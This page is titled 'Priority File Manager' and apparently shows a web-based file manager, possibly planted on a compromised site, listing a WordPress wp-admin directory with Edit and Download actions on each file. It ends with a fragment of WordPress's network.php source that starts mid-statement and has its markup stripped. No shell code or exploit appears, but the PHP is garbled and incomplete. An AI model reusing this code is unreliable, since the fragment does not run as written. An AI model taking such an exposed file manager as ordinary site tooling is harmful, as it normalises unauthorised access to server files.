Priority File Manager

📁 public_html
Base Directory:
/home/toolrmtm/crazyespresso.com/wp-admin
NameTypeSizeActions
📁 .. Folder -
📄 about.php File 15611
Edit Download
📄 admin-ajax.php File 5146
Edit Download
📄 admin-footer.php File 2834
Edit Download
📄 admin-functions.php File 479
Edit Download
📄 admin-header.php File 9336
Edit Download
📄 admin-post.php File 2021
Edit Download
📄 admin.php File 12646
Edit Download
📄 async-upload.php File 5604
Edit Download
📄 authorize-application.php File 10335
Edit Download
📄 comment.php File 11622
Edit Download
📄 contribute.php File 5998
Edit Download
📄 credits.php File 4483
Edit Download
📁 css Folder -
📄 custom-background.php File 489
Edit Download
📄 custom-header.php File 499
Edit Download
📄 customize.php File 11271
Edit Download
📄 edit-comments.php File 14729
Edit Download
📄 edit-form-advanced.php File 29527
Edit Download
📄 edit-form-blocks.php File 14947
Edit Download
📄 edit-form-comment.php File 8543
Edit Download
📄 edit-link-form.php File 6354
Edit Download
📄 edit-tag-form.php File 10688
Edit Download
📄 edit-tags.php File 22533
Edit Download
📄 edit.php File 19952
Edit Download
📄 erase-personal-data.php File 7505
Edit Download
📄 error_log File 81092
Edit Download
📄 export-personal-data.php File 7941
Edit Download
📄 export.php File 11288
Edit Download
📄 freedoms.php File 4916
Edit Download
📁 images Folder -
📄 import.php File 7766
Edit Download
📁 includes Folder -
📄 index.php File 7864
Edit Download
📄 install-helper.php File 6961
Edit Download
📄 install.php File 18192
Edit Download
📁 js Folder -
📄 link-add.php File 934
Edit Download
📄 link-manager.php File 4361
Edit Download
📄 link-parse-opml.php File 2784
Edit Download
📄 link.php File 2957
Edit Download
📄 load-scripts.php File 2070
Edit Download
📄 load-styles.php File 2995
Edit Download
📁 maint Folder -
📄 media-new.php File 3276
Edit Download
📄 media-upload.php File 3668
Edit Download
📄 media.php File 819
Edit Download
📄 menu-header.php File 10059
Edit Download
📄 menu.php File 17880
Edit Download
📄 moderation.php File 307
Edit Download
📄 ms-admin.php File 196
Edit Download
📄 ms-delete-site.php File 4613
Edit Download
📄 ms-edit.php File 216
Edit Download
📄 ms-options.php File 229
Edit Download
📄 ms-sites.php File 215
Edit Download
📄 ms-themes.php File 217
Edit Download
📄 ms-upgrade-network.php File 219
Edit Download
📄 ms-users.php File 215
Edit Download
📄 my-sites.php File 4858
Edit Download
📄 nav-menus.php File 49345
Edit Download
📁 network Folder -
📄 network.php File 5522
Edit Download
📄 options-discussion.php File 16297
Edit Download
📄 options-general.php File 22167
Edit Download
📄 options-head.php File 621
Edit Download
📄 options-media.php File 6530
Edit Download
📄 options-permalink.php File 21726
Edit Download
📄 options-privacy.php File 10190
Edit Download
📄 options-reading.php File 10174
Edit Download
📄 options-writing.php File 9323
Edit Download
📄 options.php File 13930
Edit Download
📄 plugin-editor.php File 14082
Edit Download
📄 plugin-install.php File 7124
Edit Download
📄 plugins.php File 30724
Edit Download
📄 post-new.php File 2768
Edit Download
📄 post.php File 10274
Edit Download
📄 press-this.php File 2396
Edit Download
📄 privacy-policy-guide.php File 3756
Edit Download
📄 privacy.php File 2854
Edit Download
📄 profile.php File 283
Edit Download
📄 revision.php File 5836
Edit Download
📄 setup-config.php File 17904
Edit Download
📄 site-editor.php File 12271
Edit Download
📄 site-health-info.php File 4088
Edit Download
📄 site-health.php File 10448
Edit Download
📄 term.php File 2249
Edit Download
📄 theme-editor.php File 17279
Edit Download
📄 theme-install.php File 23945
Edit Download
📄 themes.php File 49075
Edit Download
📄 tools.php File 3514
Edit Download
📄 update-core.php File 46539
Edit Download
📄 update.php File 13092
Edit Download
📄 upgrade-functions.php File 341
Edit Download
📄 upgrade.php File 6422
Edit Download
📄 upload.php File 15259
Edit Download
📁 user Folder -
📄 user-edit.php File 41328
Edit Download
📄 user-new.php File 24623
Edit Download
📄 users.php File 23846
Edit Download
📄 widgets-form-blocks.php File 5242
Edit Download
📄 widgets-form.php File 19719
Edit Download
📄 widgets.php File 1112
Edit Download
tables( 'ms_global' ) as $table => $prefixed_table ) { $wpdb->$table = $prefixed_table; } if ( ! network_domain_check() && ( ! defined( 'WP_ALLOW_MULTISITE' ) || ! WP_ALLOW_MULTISITE ) ) { wp_die( printf( /* translators: 1: WP_ALLOW_MULTISITE, 2: wp-config.php */ __( 'You must define the %1$s constant as true in your %2$s file to allow creation of a Network.' ), 'WP_ALLOW_MULTISITE', 'wp-config.php' ) ); } if ( is_network_admin() ) { // Used in the HTML title tag. $title = __( 'Network Setup' ); $parent_file = 'settings.php'; } else { // Used in the HTML title tag. $title = __( 'Create a Network of WordPress Sites' ); $parent_file = 'tools.php'; } $network_help = '

' . __( 'This screen allows you to configure a network as having subdomains (site1.example.com) or subdirectories (example.com/site1). Subdomains require wildcard subdomains to be enabled in Apache and DNS records, if your host allows it.' ) . '

' . '

' . __( 'Choose subdomains or subdirectories; this can only be switched afterwards by reconfiguring your installation. Fill out the network details, and click Install. If this does not work, you may have to add a wildcard DNS record (for subdomains) or change to another setting in Permalinks (for subdirectories).' ) . '

' . '

' . __( 'The next screen for Network Setup will give you individually-generated lines of code to add to your wp-config.php and .htaccess files. Make sure the settings of your FTP client make files starting with a dot visible, so that you can find .htaccess; you may have to create this file if it really is not there. Make backup copies of those two files.' ) . '

' . '

' . __( 'Add the designated lines of code to wp-config.php (just before /*...stop editing...*/) and .htaccess (replacing the existing WordPress rules).' ) . '

' . '

' . __( 'Once you add this code and refresh your browser, multisite should be enabled. This screen, now in the Network Admin navigation menu, will keep an archive of the added code. You can toggle between Network Admin and Site Admin by clicking on the Network Admin or an individual site name under the My Sites dropdown in the Toolbar.' ) . '

' . '

' . __( 'The choice of subdirectory sites is disabled if this setup is more than a month old because of permalink problems with “/blog/” from the main site. This disabling will be addressed in a future version.' ) . '

' . '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Creating a Network' ) . '

' . '

' . __( 'Documentation on the Network Screen' ) . '

'; get_current_screen()->add_help_tab( array( 'id' => 'network', 'title' => __( 'Network' ), 'content' => $network_help, ) ); get_current_screen()->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Creating a Network' ) . '

' . '

' . __( 'Documentation on the Network Screen' ) . '

' . '

' . __( 'Support forums' ) . '

' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?>

get_error_codes() ) && 'no_wildcard_dns' === $result->get_error_code() ) { network_step2( $result ); } else { network_step1( $result ); } } else { network_step2(); } } else { network_step2(); } } elseif ( is_multisite() || network_domain_check() ) { network_step2(); } else { network_step1(); } ?>